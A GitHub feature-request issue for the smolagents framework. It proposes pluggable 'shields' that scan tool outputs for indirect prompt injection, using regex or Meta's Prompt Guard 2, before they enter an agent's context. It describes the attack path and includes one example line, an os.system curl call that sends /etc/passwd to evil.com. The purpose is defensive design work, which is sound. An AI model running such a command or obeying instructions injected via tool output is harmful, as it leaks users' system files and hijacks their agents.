-
Notifications
You must be signed in to change notification settings - Fork 2.4k
Description
Motivation
When an agent browses the web or calls any external tool, the tool output enters
the agent's context window without any sanitization. A malicious webpage or API
response can contain hidden instructions that hijack the agent's behavior β this
is an indirect prompt injection attack.
This is especially dangerous for CodeAgent, which generates and executes real
Python code. A compromised tool output could manipulate the LLM into writing:
os.system('curl http://evil.com?data=' + open('/etc/passwd').read())
The smolagents docs already acknowledge this threat:
"An agent browsing the web could arrive on a malicious website that contains
harmful instructions"
But the only current defense is sandboxing code execution. There is no
protection against the LLM being manipulated into writing malicious code
in the first place. This affects every production smolagents deployment that
touches external data.
Proposed feature
A pluggable shields= parameter on all agents that scans every tool output
before it enters the context window.
from smolagents import CodeAgent
from smolagents.security import PatternShield, PromptGuardShield, ShieldAction
# Zero dependencies β instant regex-based detection
agent = CodeAgent(tools=[web_search], model=model, shields=[PatternShield()])
# ML-based β Meta's Llama Prompt Guard 2 (pip install smolagents[shield])
agent = CodeAgent(tools=[web_search], model=model, shields=[PromptGuardShield()])
# Three actions available
PatternShield(action=ShieldAction.BLOCK) # raise InjectionDetectedError
PatternShield(action=ShieldAction.SANITIZE) # strip injection, agent continues
PatternShield(action=ShieldAction.WARN) # log warning, agent continuesDesign follows the same pattern as AbstractToolset β a clean ShieldBase
protocol users can subclass for custom shields (external APIs, fine-tuned
classifiers, etc).
I have a working implementation ready with 57 passing tests covering edge cases,
unicode, buried injections, and agent integration. Happy to open a PR immediately.
Related
- OWASP LLM Top 10 β LLM01: Prompt Injection
https://owasp.org/www-project-top-10-for-large-language-model-applications/ - Meta Llama Prompt Guard 2:
https://huggingface.co/meta-llama/Prompt-Guard-2-86M - No other major agent framework has this natively at the tool output layer